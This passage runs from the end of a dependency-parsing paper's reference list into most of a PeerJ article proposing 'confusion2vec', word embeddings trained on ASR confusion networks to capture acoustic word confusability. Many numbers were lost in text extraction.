acl-hlt. egon balas. . an additive algorithm for solving linear programs with zero-one variables. operations research, ( ). bernd bohnet and jonas kuhn. . the best of bothworlds – a graph-based completion model for transition-based parsers. in proc. of eacl. bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. in proc. of emnlp-conll. paul calamai and jorge moré. . projected gradien- t methods for linearly constrained problems. mathe- matical programming, ( ). xavier carreras. . experiments with a higher-order projective dependency parser. in proc. of emnlp- conll. eugene charniak and mark johnson. . coarse-to- fine n-best parsing and maxent discriminative rerank- ing. in proc. of acl. wenliang chen, min zhang, and haizhou li. . u- tilizing dependency language models for graph-based dependency parsing models. in proc. of acl. michael collins. . discriminative reranking for nat- ural language parsing. in proc. of icml. michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proc. of emnlp. john duchi, shai shalev-shwartz, yoram singer, and tushar chandra. . efficient projections onto the l -ball for learning in high dimensions. in proc. of icml. jason m. eisner. . three new probabilistic models for dependency parsing: an exploration. in proc. of coling. keith hall. . k-best spanning tree parsing. in proc. of acl. liang huang and david chiang. . better k-best parsing. in proc. of iwpt. liang huang. . forest reranking: discriminative parsing with non-local features. in proc. of acl-hlt. manfred klenner and étienne ailloud. . opti- mization in coreference resolution is not needed: a nearly-optimal algorithm with intensional constraints. in proc. of eacl. terry koo and michael collins. . efficient third- order dependency parsers. in proc. of acl. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl-hlt. terry koo, alexander m. rush, michael collins, tommi jaakkola, and david sontag. . dual decomposi- tion for parsing with non-projective head automata. in proc. of emnlp. ailsa h. land and alison g. doig. . an automat- ic method of solving discrete programming problems. econometrica, ( ): – . andre martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proc. of acl. andre martins, noah smith, mario figueiredo, and pe- dro aguiar. . dual decomposition with many overlapping components. in proc. of emnlp. ryan mcdonald, koby crammer, and fernando pereira. a. online large-margin training of dependency parsers. in proc. of acl. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajic. b. non-projective dependency pars- ing using spanning tree algorithms. in proc. of hlt- emnlp. joakim nivre and ryan mcdonald. . integrating graph-based and transition-based dependency parsers. in proc. of acl-hlt. jorge nocedal and stephen j. wright. . numerical optimization. springer, nd edition. sebastian riedel and james clarke. . incremental integer linear programming for non-projective depen- dency parsing. in proc. of emnlp. alexander m rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural language processing. in proc. of emnlp. david smith and jason eisner. . dependency pars- ing by belief propagation. in proc. of emnlp. min sun, murali telaprolu, honglak lee, and silvio savarese. . efficient and exact map-mrf in- ference using branch and bound. in proc. of aistats. jun suzuki, hideki isozaki, xavier carreras, and michael collins. . an empirical study of semi-supervised structured conditional models for dependency parsing. in proc. of emnlp. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in proc. of iwpt. yue zhang and stephen clark. . a tale of t- wo parsers: investigating and combining graph-based and transition-based dependency parsing. in proc. of emnlp. hao zhang and ryan mcdonald. . generalized higher-order dependency parsing with cube pruning. in proc. of emnlp. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proc. of acl-hlt. confusion vec: towards enriching vector space word representations with representational ambiguities confusion vec: towards enriching vector space word representations with representational ambiguities prashanth gurunath shivakumar and panayiotis georgiou electrical and computer engineering, university of southern california, los angeles, ca, usa abstract word vector representations are a crucial part of natural language processing (nlp) and human computer interaction. in this paper, we propose a novel word vector representation, confusion vec, motivated from the human speech production and perception that encodes representational ambiguity. humans employ both acoustic similarity cues and contextual cues to decode information and we focus on a model that incorporates both sources of information. the representational ambiguity of acoustics, which manifests itself in word confusions, is often resolved by both humans and machines through contextual cues. a range of representational ambiguities can emerge in various domains further to acoustic perception, such as morphological transformations, word segmentation, paraphrasing for nlp tasks like machine translation, etc. in this work, we present a case study in application to automatic speech recognition (asr) task, where the word representational ambiguities/confusions are related to acoustic similarity. we present several techniques to train an acoustic perceptual similarity representation ambiguity. we term this confusion vec and learn on unsupervised-generated data from asr confusion networks or lattice-like structures. appropriate evaluations for the confusion vec are formulated for gauging acoustic similarity in addition to semantic–syntactic and word similarity evaluations. the confusion vec is able to model word confusions efficiently, without compromising on the semantic-syntactic word relations, thus effectively enriching the word vector space with extra task relevant ambiguity information. we provide an intuitive exploration of the two-dimensional confusion vec space using principal component analysis of the embedding and relate to semantic relationships, syntactic relationships, and acoustic relationships. we show through this that the new space preserves the semantic/syntactic relationships while robustly encoding acoustic similarities. the potential of the new vector representation and its ability in the utilization of uncertainty information associated with the lattice is demonstrated through small examples relating to the task of asr error correction. subjects artificial intelligence, natural language and speech keywords confusion vec, word vec, embeddings, word representations, confusion networks, asr output representations, lexical representational ambiguity introduction decoding human language is challenging for machines. it involves estimation of efficient, meaningful representation of words. machines represent the words in the form of real how to cite this article gurunath shivakumar p, georgiou p. . confusion vec: towards enriching vector space word representations with representational ambiguities. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted april published june corresponding author panayiotis georgiou, georgiou@sipi.usc.edu academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright gurunath shivakumar and georgiou distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:georgiou@�sipi.�usc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ vectors and the language as a vector space. vector space representations of language have applications spanning natural language processing (nlp) and human computer interaction fields. more specifically, word embeddings can act as features for machine translation, automatic speech recognition (asr), document topic classification, information retrieval, sentiment classification, emotion recognition, behavior recognition, question answering, etc. early work employed words as the fundamental unit of feature representation. this could be thought of as each word representing an orthogonal vector in a n-dimensional vector space of language with n-words (often referred to as one-hot representation). such a representation, due to the inherent orthogonality, lacks crucial information regarding inter–word relationships such as similarity. several techniques found using co-occurrence information of words are a better feature representation (ex: n-gram language modeling). subsequent studies introduced few matrix factorization based techniques to estimate a more efficient, reduced dimensional vector space based on word co-occurrence information. latent semantic analysis (lsa) assumes an underlying vector space spanned by orthogonal set of latent variables closely associated with the semantics/meanings of the particular language. the dimension of this vector space is much smaller than the one-hot representation (deerwester et al., ). lsa was proposed initially for information retrieval and indexing, but soon gained popularity for other nlp tasks. hofmann ( ) proposed probabilistic lsa replacing the co-occurrence information by a statistical class based model leading to better vector space representations. another popular matrix factorization method, the latent dirichlet allocation assumes a generative statistical model where the documents are characterized as a mixture of latent variables representing topics which are described by word distributions (blei, ng & jordan, ). recently, neural networks have gained popularity. they often outperform the n-gram models (bengio et al., ; mikolov et al., ) and enable estimation of more complex models incorporating much larger data than before. various neural network based vector space estimation of words were proposed. bengio et al. ( ) proposed feed- forward neural network based language models which jointly learned the distributed word representation along with the probability distribution associated with the representation. estimating a reduced dimension continuous word representation allows for efficient probability modeling, thereby resulting in much lower perplexity compared to an n-gram model. recurrent neural network based language models, with inherent memory, allowed for the exploitation of much longer context, providing further improvements compared to feed forward neural networks (mikolov et al., ). mikolov et al. ( a) proposes a new technique of estimating vector representation (popularly termed word vec) which showed promising results in preserving the semantic and syntactic relationships between words. two novel architectures based on simple log-linear modeling (i) continuous skip-gram and (ii) continuous bag-of-words are introduced. both the models are trained to model local context of word occurrences. the continuous skip-gram model predicts surrounding words given the current word. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ whereas, the continuous bag-of-words model predicts the current word given its context. the task evaluation is based on answering various analogy questions testing semantic and syntactic word relationships. several training optimizations and tips were proposed to further improve the estimation of the vector space by mikolov et al. ( c) and mnih & kavukcuoglu ( ). such efficient representation of words directly influences the performance of nlp tasks like sentiment classification (kim, ), part-of-speech tagging (ling et al., ), text classification (lilleberg, zhu & zhang, ; joulin et al., ), document categorization (xing et al., ), and many more. subsequent research efforts on extending word vec involve expanding the word representation to phrases (mikolov et al., c), sentences and documents (le & mikolov, ). similarly, training for contexts derived from the syntactic dependencies of a word is shown to produce useful representations (levy & goldberg, ). using morphemes for word representations can enrich the vector space and provide gains especially for unknown, rarely occurring, complex words, and morphologically rich languages (luong, socher & manning, ; botha & blunsom, ; qiu et al., ; cotterell & schütze, ; soricut & och, ). likewise, incorporating sub-word representations of words for the estimation of vector space is beneficial (bojanowski et al., ). similar studies using characters of words have also been tried (chen et al., ). yin & schütze ( ) explored ensemble techniques for exploiting complementary information over multiple word vector spaces. studies by mikolov, le & sutskever ( b) and faruqui & dyer ( ) demonstrate that vector space representations are extremely useful in extending the model from one language to another (or multi-lingual extensions) since the semantic relations between words are invariant across languages. some have tried to combine the advantages from both matrix factorization based techniques and local-context word vec models. pennington, socher & manning ( ) proposes global log-bilinear model for modeling global statistical information as in the case of global matrix factorization techniques along with the local context information as in the case of word vec. the goal of this study is to come up with a new vector space representation for words which incorporates the uncertainty information in the form of word confusions present in lattice like structures (e.g., confusion networks). here, the word confusions refers to any word level ambiguities resultant of perception confusability or any algorithms such as machine translation, asr etc. for example, acoustically confusable words in asr lattices: “two” and “to” (see fig. ). a word lattice is a compact representation (directed acyclic weighted graphs) of different word sequences that are likely possible. a confusion network is a special type of lattice, where each word sequence is made to pass through each node of the graph. the lattices and confusion networks embed word confusion information. the study takes motivation from human perception, that is, the ability of humans to decode information based on two fairly independent information streams (see section “human speech production, perception and hearing” for examples): (i) linguistic context (modeled by word vec like word vector representations), and (ii) acoustic confusability (relating to phonology). gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the present word vector representations like word vec only incorporate the contextual confusability during modeling. however, in order to handle confusability and to decode human language/speech successfully, there is a need to model both the dimensions. although primarily, the motivation is derived from human speech and perception, the confusions are not constrained to acoustics and can be extended to any confusions parallel to the linguistic contexts, for example, confusions present in lattices. most of the machine learning algorithms output predictions as a probability measure. this uncertainty information stream can be expressed in the form of a lattice or a confusion network temporally, and is often found to contain useful information for subsequent processing and analysis. the scope of this work is to introduce a complementary (ideally orthogonal) subspace in addition to the underlying word vector space representation captured by word vec. this new subspace captures the word confusions orthogonal to the syntactic and semantics of the language. we propose confusion vec vector space operating on lattice like structures, specifically word confusion networks. we introduce several training configurations and evaluate their effectiveness. we also formulate appropriate evaluation criterion to assess the performance of each orthogonal subspaces, first independently and then jointly. analysis of the proposed word vector space representation is carried out. the rest of the paper is organized as follows. motivation for confusion vec, that is, the need to model word-confusions for word embeddings, is provided through means of human speech and perception, machine learning, and through potential applications in the section “motivation”. a particular case study is chosen and the problem is formulated in the section “case study: application to automatic speech recognition”. in the section “proposed models”, different training configurations for efficient estimation of word embeddings are proposed. additional tuning schemes for the proposed confusion vec models are presented in the section “training schemes”. evaluation criterion formulation and evaluation database creation is presented in the section “evaluation methods”. experimental setup and baseline system is described in the section “data and experimental setup”. results are i eye to two tees seat sit eat seedwant what wand acoustic confusability axis contextual content axis figure an example confusion network for ground-truth utterance “i want to sit.” full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tabulated and discussed in the section “results”. word vector space analysis is performed and findings are presented in the section “vector space analysis”. section “discussion” discusses with the help of few toy examples, the benefits of the confusion vec embeddings for the task of asr error correction. section “conclusion” draws the conclusion of the study and finally the future research directions are discussed in the section “future work”. motivation one efficient way to represent words as vectors is to represent them in a space that preserves the semantic and syntactic relations between the words in the language. word vec describes a technique to achieve such a representation by trying to predict the current word from its local context (or vice-versa) over a large text corpora. the estimated word vectors are shown to encode efficient syntactic-semantic language information. in this work, we propose a new vector space for word representation which incorporates various forms of word confusion information in addition to the semantic and syntactic information. the new vector space is inspired and motivated from the following factors from human speech production and perception and machine learning. human speech production, perception, and hearing in our everyday interactions, confusability can often result in the need for context to decode the underlying words. “please_____ a seat.” (example ) in example , the missing word could be guessed from its context and narrowed down to either “have” or “take.” this context information is modeled through language models. more complex models such as word vec also use the contextual information to model word vector representations. on the other hand, confusability can also originate from other sources such as acoustic representations. “i want to seat” (example ) in example , the underlined word is mispronounced/misheard, and grammatically incorrect. in this case, considering the context there exists a lot of possible correct substitutions for the word “seat” and hence the context is less useful. the acoustic construct of the word “seat” can present additional information in terms of acoustic alternatives/similarity, such as “sit” and “seed.” “i want to s—” (example ) similarly in example , the underlined word is incomplete. the acoustic confusability information can be useful in the above case of broken words. thus, since the confusability is acoustic, purely lexical vector representations like word vec fail to encode or capture it. in this work, we propose to additionally encode the word (acoustic) confusability information to learn a better word embedding. although the motivation is specific to gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acoustics in this case, it could be extended to other inherent sources of word-confusions spanning various machine learning applications. machine learning algorithms most of the machine learning algorithms output hypothesis as a probability measure. such a hypothesis could be represented in the form of a lattice, confusion network or n-best lists. it is often useful to consider the uncertainty associated with the hypothesis for subsequent processing and analysis (see section “potential applications”). the uncertainty information is often, orthogonal to the contextual dimension and is specific to the task attempted by the machine learning algorithms. along this direction, recently, there have been several efforts concentrated on introducing lattice information into the neural network architecture. initially, tree-lstm was proposed enabling tree-structured network topologies to be inputted to the rnns (tai, socher & manning, ), which could be adapted and applied to lattices (sperber et al., ). latticernn was proposed for processing word level lattices for asr (ladhak et al., ). lattice based gated recurrent units (su et al., ) and lattice-to-sequence models (tan et al., ) were proposed for reading word lattice as input, specifically a lattice with tokenization alternatives for machine translation models. latticelstm was adopted for lattice-to-sequence model incorporating lattice scores for the task of speech translation by sperber et al. ( ). buckman & neubig ( ) proposed neural lattice language models which enables to incorporate many possible meanings for words and phrases (paraphrase alternatives). thus, a vector space representation capable of embedding relevant uncertainty information in the form of word confusions present in lattice-like structures or confusion networks along with the semantic and syntactic can be potentially superior to word vec space. case study: application to automatic speech recognition in this work, we consider the asr task as a case study to demonstrate the effectiveness of the proposed confusion vec model in modeling acoustic word-confusability. however, the technique can be adopted for a lattice or confusion network output from potentially any algorithm to capture various patterns as discussed in the section “potential applications,” in which case the confusion-subspace (vertical ambiguity in fig. ), is no longer constrained to acoustic word-confusions. an asr lattice contains multiple paths over acoustically similar words. a lattice could be transformed and represented as a linear graph forcing every path to pass through all the nodes (xue & zhao, ; mangu, brill & stolcke, ). such a linear graph is referred to as a confusion network. figure shows a sample confusion network output by asr for the ground truth “i want to sit.” the confusion network could be viewed along two fundamental dimensions of information (see fig. ): (i) contextual axis—sequential structure of a sentence, (ii) acoustic axis—similarly sounding word alternatives. traditional word vector representations such as word vec only model the contextual gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information (the horizontal (red) direction in fig. ). the word confusions, for example, the acoustic contextualization as in fig. (the vertical (green) direction in fig. ) is not encoded. we propose to additionally capture the co-occurrence information along the acoustic axis orthogonal to the word vec. this is the main focus of our work, that is, to jointly learn the vertical, word-confusion context and the horizontal, semantic and syntactic context. in other words, we hypothesize to derive relationships between the semantics and syntaxes of language and the word-confusions (acoustic-confusion). related work bengio & heigold ( ) trained a continuous word embedding of acoustically alike words (using n-gram feature representation of words) to replace the state space models (hidden markov models, hmms), decision trees, and lexicons of an asr. through the use of such an embedding and lattice re-scoring technique demonstrated improvements in word error rates of asr. the embeddings are also shown to be useful in application to the task of asr error detection by ghannay et al. ( ). a few evaluation strategies are also devised to evaluate phonetic and orthographic similarity of words. additionally, there have been studies concentrating on estimating word embeddings from acoustics (kamper, wang & livescu, ; chung et al., ; levin et al., ; he, wang & livescu, ) with evaluations based on acoustic similarity measures. parallely, word vec like word embeddings have been used successfully to improve asr error detection performance (ghannay, estève & camelin, a; ghannay et al., b). we believe the proposed exploitation of both information sources, that is, acoustic relations and linguistic relations (semantics and syntaxes) will be beneficial in asr and error detection, correction tasks. the proposed confusion vec operates on the lattice output of the asr in contrast to the work on acoustic word embeddings (kamper, wang & livescu, ; chung et al., ; levin et al., ; he, wang & livescu, ) which is directly trained on audio. the proposed confusion vec differs from works by bengio & heigold ( ) and ghannay et al. ( ), which also utilize audio data with the hypothesis that the layer right below softmax layer of a deep end-to-end asr contains acoustic similarity information of words. confusion vec can also be potentially trained without an asr, on artificially generated data, emulating an asr (tan et al., ; sagae et al., ; celebi et al., ; kurata, itoh & nishimura, ; dikici, celebi & saraçlar, ; xu, roark & khudanpur, ). thus, confusion vec can potentially be trained in a completely unsupervised manner and with appropriate model parameterization incorporate various degrees of acoustic confusability, for example, stemming from noise or speaker conditions. further, in contrast to the prior works on lattice encoding rnns (tai, socher & manning, ; sperber et al., ; ladhak et al., ; su et al., ; tan et al., ; buckman & neubig, ), which concentrate on incorporating the uncertainty information embedded in the word lattices by modifying the input architecture for recurrent neural network, we propose to introduce the ambiguity information from the lattices to the word embedding explicitly. we expect similar advantages as with lattice encoding rnns in using the pre-trained confusion vec embedding toward various tasks gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ like asr, machine translation etc. moreover, our architecture doesn’t require memory which has significant advantages in terms of training complexity. we propose to train the embedding in a similar way to word vec models (mikolov et al., a). all the well studied previous efforts toward optimization of training such models (mikolov et al., c; mnih & kavukcuoglu, ), should apply to our proposed model. proposed models in this section, we propose four training schemes for confusion vec. the training schemes are based on the word vec model. word vec work (mikolov et al., a) proposed log-linear models, that is, a neural network consisting of a single linear layer (projection matrix) without non-linearity. these models have significant advantages in training complexity. mikolov et al. ( a) found the skip-gram model to be superior to the bag-of-word model in a semantic-syntactic analogy task. hence, we only employ the skip-gram configuration in this work. appropriately, the skip-gram word vec model is also adopted as the baseline for this work. the choice of the skip-gram modeling in this work is mainly based on its popularity, ease of implementation, low complexity, and being a well-proven technique in the community. however, we strongly believe the proposed concept (introducing word ambiguity information) is independent of the modeling technique itself and should translate to relatively newer techniques like glove pennington, socher & manning ( ) and fasttext bojanowski et al. ( ). top-confusion training—c v- we adapt the word vec contextual modeling to operate on the confusion network (in our case confusion network of an asr). figure shows the training configuration of the skip-gram word vec model on the confusion network. the top-confusion model considers the context of only the top hypothesis of the confusion network (single path) for training. w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t- ) c(t- ) c(t+ ) c(t+ ) output c(t) input figure top-confusion vec training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time-stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for clarity we call this the c v- model since it’s using only the top hypothesis. the words wt- , , wt- , , wt+ , , and wt+ , (i.e., the most probable words in the confusions c(t- ), c(t- ), c(t+ ), and c(t+ ), respectively) are predicted from wt, (i.e., the most probable word in c(t)) for a skip-window of as depicted in fig. . the top hypothesis typically consists of noisy transformations of the reference ground-truth (note: the confusion network will inherently introduce additional paths to the lattice). in the case of a confusion network of an asr, the noisy transformations correspond to acoustic word confusions. thus, the top-confusion model implicitly captures word confusions (co-occurring within the context of the skip-window). intra-confusion training—c v-a next, we explore the direct adaptation of the skip-gram modeling but on the confusion dimension (i.e., considering word confusions as contexts) rather than the traditional sequential context. figure shows the training configuration over a confusion network. in short, every word is linked with every other alternate word in the confusion dimension (i.e., between set of confusable words) through the desired network (as opposed to the temporal context dimension in the word vec training). for clarity, since this is only using acoustically alternate words, we call this the c v-acoustics or c v-a model for short. note, we disallow any word being predicted from itself (this constrain is indicated with curved dotted lines in the figure). as depicted in the fig. , the word wt,i w t, w t, w t, c(t) input output w t, w t, w t, c(t) w t+ , w t+ , w t+ , c(t+ ) w t+ , w t+ , w t+ , c(t+ ) w t- , w t- , w t- , c(t- ) w t- , w t- , w t- , c(t- ) figure proposed intra-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . the dotted curved lines denote that the self-mapping is disallowed. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (confusion context) is predicted from wt,j (current word), where i = , , : : : length(c(t)) and j s i, for each j = , , : : : length(c(t)) for confusion c(t) ∀t. we expect such a model to capture inherent relations over the different word confusions. in the context of an asr lattice, we expect it to capture intrinsic relations between similarly sounding words (acoustically similar). however, the model would fail to capture any semantic and syntactic relations associated with the language. the embedding obtained from this configuration can be fused (concatenated) with the traditional skip-gram word vec embedding to form a new subspace representing both the independently trained subspaces. the number of training samples generated with this configuration is: #samples ¼ xn i¼ di � ðdi � Þ ( ) where n is the number of time steps, di is the number of confusions at the ith time step. inter-confusion training—c v-c in this configuration, we propose to model both the linguistic contexts and the word confusion contexts simultaneously. figure illustrates the training configuration. each word in the current confusion is predicted from each word from the succeeding and preceding confusions over a predefined local context. to elaborate, the words wt-t′,i (context) are predicted from wt,j (current word) for i = , , : : : length(c(t-t′)), j = , , : : : length(c(t)), t′ ∈ , ,- ,- for skip-window of for current confusion c(t)∀t as per fig. . since we assume the acoustic similarities for a word to be co-occurring, we expect to jointly model the co-occurrence of both the context and confusions. for clarity, since even the acoustic similarities are learned through context and not direct w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t) c(t- ) c(t- ) c(t+ ) c(t+ ) input output figure proposed inter-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acoustic mapping, as in the intra-confusion case, we call the inter-confusion training c v-context or c v-c for short. this also has the additional benefit of generating more training samples than the intra- confusion training. the number of training samples generated is given by: #samples ¼ xn i¼ xiþsw j¼i�sw j ¼i di � dj ( ) where n is the total number of time steps, di is the number of word confusions at the i th time step, sw is the skip-window size (i.e., sample sw words from history and sw words from the future context of current word). inter-confusion training can be viewed as an extension of top-confusion training where the skip-gram modeling is applied to all possible paths through the confusion network. hybrid intra-inter confusion training—c v-� finally, we merge both the intra-confusion and inter-confusion training. for clarity we call this model the c v-� since it combines all the previous cases. this can be seen as a super-set of top-confusion, inter-confusion and intra-confusion training configurations. figure illustrates the training configuration. the words wt-t′,i (context) are predicted from wt,j (current word) for i = , , : : : length(c(t-t′)), j = , , : : : length (c(t)), t′ ∈ , , ,- ,- such that if t′ = then i s j; for skip-window of for current confusion c(t)∀t as depicted in fig. . we simply add the combination of training samples from the above two proposed techniques (i.e., the number of samples is the sum of eqs. ( ) and ( )). w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t) c(t- ) c(t- ) c(t+ ) c(t+ ) input output w t, w t, w t, c(t) figure proposed hybrid-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p (wt, ) : : : . the dotted curved lines denote that the self-mapping is disallowed. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training schemes model initialization/pre-training very often, it has been found that better model initializations lead to better model convergence (erhan et al., ). this is more significant in the case of under-represented words. moreover, for training the word confusion mappings, it would benefit to build upon the contextual word embeddings, since our final goal is in conjunction with both contextual and confusion information. hence, we experiment initializing all our models with the original google’s word vec model (https://code.google.com/archive/p/word vec/) trained on google news dataset with billion words as described by mikolov et al. ( c). pre-training rules are explained in the flowchart in fig. a. for the words present in the google’s word vec vocabulary, we directly initialize the embeddings with word vec. the embeddings for rest of the words are randomly initialized following uniform distribution. model concatenation the hypothesis with model concatenation is that the two subspaces, one representing the contextual subspace (word vec), and the other capturing the confusion subspace can be both trained independently and concatenated to give a new vector space which manifests both the information and hence a potentially useful vector word representation. flowchart for model concatenation is shown in fig. b. the model concatenation can be mathematically represented as: newn�e þe ¼ w vn�e c vn�e ½ � ( ) where new is the new concatenated vector space of dimensions n � e + e , and n is the vocabulary size, e and e are the embedding sizes of w v and c v subspaces, respectively. start w v with pre-training (c v- ) intra/inter/hybrid c v-(a/c/*) concatenate embeddings end start model concatenation joint optimization mode fix weights of baseline contextual subspace fine tuning intra/inter/hybrid c v-(a/c/*) end fixed unrestricted start word google vocab initialize from google w v initialize randomly end yes no (a) flowchart for pre-training/initializing models (b) flowchart for concatenating models (c) flowchart for joint optimization using unrestricted and figure flowcharts for proposed training schemes. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ joint optimization further to the model concatenation scheme, one could fine-tune the new vector space representation to better optimize to the task criterion (fine-tuning involves re-training end-to-end with a relatively lower learning rate than usual). this could be viewed as a case of relaxing the strict independence between two subspaces as in the case of model concatenation. the fine-tuning itself could be either of the aforementioned proposed techniques. we specifically try two configurations of joint optimization. i. fixed contextual subspace in this configuration, we fix the contextual (word vec) subspace and fine-tune only the confusion subspace. since the word vec already provides robust contextual representation, any fine-tuning on contextual space could possibly lead to sub-optimal state. keeping the word vec subspace fixed also allows the model to concentrate more specifically toward the confusion since the fixed subspace compensates for all the contextual mappings during training. this allows us to constrain the updatable parameters during joint optimization. it also allows for the possibility to directly use available word vec models without modifications. the flowchart for the fixed contextual subspace joint optimization is displayed in fig. c. ii. unrestricted in this configuration, we optimize both the subspaces, that is, the contextual (word vec) and the confusion subspaces. the hypothesis is the fine-tuning allows the two subspaces to interact to achieve the best possible representation. the flowchart for the unrestricted joint optimization is displayed in fig. c. evaluation methods prior literature suggests, there are two prominent ways for evaluating the vector space representation of words. one is based on semantic and syntactic analogy task as introduced by mikolov et al. ( a). the other common approach has been to assess the word similarities by computing the rank-correlation (spearman’s correlation) on human annotated word similarity databases (schnabel et al., ) like wordsim- (finkelstein et al., ). although the two evaluations can judge the vector representations of words efficiently for semantics and syntax of a language, we need to device an evaluation criteria for the word confusions, specifically for our case scenario—the acoustic confusions of words. for this, we formulate evaluations for acoustic confusions parallel to the analogy task and the word similarity task. analogy tasks semantic and syntactic analogy task mikolov et al. ( a) introduced an analogy task for evaluating the vector space representation of words. the task was based on the intuition that the words, say “king” is similar to “man” in the same sense as the “queen” is to “woman” and thus relies on answering questions relating to such analogies by performing algebraic operations on word representations. for example, the analogy is correct if the vector(“woman”) is most gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar to vector(“king”) - vector(“man”) + vector(“queen”). the analogy question test set is designed to test both syntactic and semantic word relationships. the test set contains five types of semantic questions ( , questions) and nine types of syntactic questions ( , questions). finally, the efficiency of the vector representation is measured using the accuracy achieved on the analogy test set. we employ this for testing the semantic and syntactic (contextual axis as in terms of fig. ) relationship inherent in the vector space. acoustic analogy task the primary purpose of the acoustic analogy task is to independently gauge the acoustic similarity information captured by the embedding model irrespective of the inherent semantic and syntactic linguistic information. adopting a similar idea and extending the same for evaluation of word confusions, we formulate the acoustic confusion analogy task (vertical context test as in terms of fig. ) as follows. for similar sounding word pairs, “see” & “sea” and “red” & “read,” the word vector “see” is similar to “sea” in the same sense as the word “red” is to “read.” we set up an acoustic analogy question set on acoustically similar sounding words, more specifically homophones. table lists a few examples from our data set. a detailed description of the creation of dataset is presented in the section “creation of evaluation datasets.” semantic and syntactic–acoustic analogy task further, rather than evaluating the semantic-syntactic tasks and the acoustic analogy tasks independently, we could test for both together. intuitively, the word vectors in each of the two subspaces should interact together. we would expect for an analogy, “see”- “saw”:“take”-“took,” the word “see” has a homophone alternative in “sea,” thus there is a possibility of the word “see” being confused with “sea” in the new vector space. thus an algebraic operation such as vector(“see”) - vector(“saw”) + vector(“take”) should be similar to vector(“took”) as before. moreover, the vector(“sea”) - vector(“saw”) + vector (“take”) should also be similar to vector(“took”). this is because we expect the vector (“sea”) to be similar to vector(“see”) under the acoustic subspace. we also take into account the more challenging possibility of more than one homophone word substitution. for example, vector(“see”) - vector(“saw”) + vector(“allow”) is similar to vector(“allowed”), vector(“aloud”), and vector(“sea”) - vector(“saw”) + vector(“allow”). the hypothesis is that to come up with such a representation the system should jointly model both the language semantic-syntactic relations and the acoustic word similarity relations between words. the task is 